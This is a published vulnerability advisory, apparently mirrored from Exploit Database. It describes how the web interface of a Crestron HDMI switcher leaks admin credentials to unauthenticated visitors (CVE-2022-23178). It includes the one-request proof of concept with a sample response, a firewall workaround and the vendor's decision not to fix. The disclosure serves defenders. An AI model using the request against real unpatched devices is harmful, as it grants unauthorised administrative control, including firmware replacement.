Creston Web Interface 1.0.0.2159 – Credential Disclosure

• Exploit Database
• 21 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2022-01-18
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50675/

• # Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure
  # Exploit Author: RedTeam Pentesting GmbH
  
  Advisory: Credential Disclosure in Web Interface of Crestron Device
  
  
  When the administrative web interface of the Crestron HDMI switcher is
  accessed unauthenticated, user credentials are disclosed which are valid
  to authenticate to the web interface.
  
  Details
  =======
  
  Product: Crestron HD-MD4X2-4K-E
  Affected Versions: 1.0.0.2159
  Fixed Versions: -
  Vulnerability Type: Information Disclosure
  Security Risk: high
  Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
  Vendor Status: decided not to fix
  Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
  Advisory Status: published
  CVE: CVE-2022-23178
  CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178
  
  
  Introduction
  ============
  
  "Crestron sets the gold standard for network security by leveraging the
  most advanced technologies including 802.1x authentication, AES
  encryption, Active Directory® credential management, JITC Certification,
  SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
  provide network security at the product level."
  
  (from the vendor's homepage)
  
  
  More Details
  ============
  
  Upon visiting the device's web interface using a web browser, a login
  form is displayed requiring to enter username and password to
  authenticate. The analysis of sent HTTP traffic revealed that in
  addition to the loading of the website, a few more HTTP requests are
  automatically triggered. One of the associated responses contains a
  username and a password which can be used to authenticate as the
  affected user.
  
  
  Proof of Concept
  ================
  
  Requesting the URL "http://crestron.example.com/" via a web browser
  results in multiple HTTP requests being sent. Among others, the
  following URL is requested:
  
  ------------------------------------------------------------------------
  http://crestron.example.com/aj.html?a=devi&_=[...]
  ------------------------------------------------------------------------
  
  This request results in a response similar to the following:
  
  ------------------------------------------------------------------------
  HTTP/1.0 200 OK
  Cache-Control: no-cache
  Content-type: text/html
  
  {
  "login_ur": 0,
  "front_val": [
  0,
  1
  ],
  "uname": "admin",
  "upassword": "password"
  }
  ------------------------------------------------------------------------
  
  The values for the keys "uname" and "upassword" could be used to
  successfully authenticate to the web interface as the affected user.
  
  
  Workaround
  ==========
  
  Reachability over the network can be restricted for access to the web
  interface, for example by using a firewall.
  
  
  Fix
  ===
  
  No fix known.
  
  
  Security Risk
  =============
  
  As user credentials are disclosed to visitors of the web interface they
  can directly be used to authenticate to it. The access allows to modify
  the device's input and output settings as well as to upload and install
  new firmware. Due to ease of exploitation and gain of administrative
  access this vulnerability poses a high risk.
  
  
  Timeline
  ========
  
  2021-10-06 Vulnerability identified
  2021-11-15 Customer approved disclosure to vendor
  2021-12-08 Vendor notified
  2021-12-15 Vendor notified again
  2021-12-21 Vendor response received: "The device in question doesn't support
   Crestron's security practices. We recommend the HD-MD-4KZ alternative."
  2021-12-22 Requested confirmation, that the vulnerability will not be addressed.
  2021-12-28 Vendor confirms that the vulnerability will not be corrected.
  2022-01-12 Advisory released
  
  
  
  RedTeam Pentesting GmbH
  =======================
  
  RedTeam Pentesting offers individual penetration tests performed by a
  team of specialised IT-security experts. Hereby, security weaknesses in
  company networks or products are uncovered and can be fixed immediately.
  
  As there are only few experts in this field, RedTeam Pentesting wants to
  share its knowledge and enhance the public knowledge with research in
  security-related areas. The results are made available as public
  security advisories.
  
  More information about RedTeam Pentesting can be found at:
  https://www.redteam-pentesting.de/
  
  
  Working at RedTeam Pentesting
  =============================
  
  RedTeam Pentesting is looking for penetration testers to join our team
  in Aachen, Germany. If you are interested please visit:
  https://www.redteam-pentesting.de/jobs/
  
  
  -- 
  RedTeam Pentesting GmbH Tel.: +49 241 510081-0
  Dennewartstr. 25-27 Fax : +49 241 510081-99
  52068 Aachenhttps://www.redteam-pentesting.de
  Germany Registergericht: Aachen HRB 14004
  Geschäftsführer: Patrick Hof, Jens Liebchen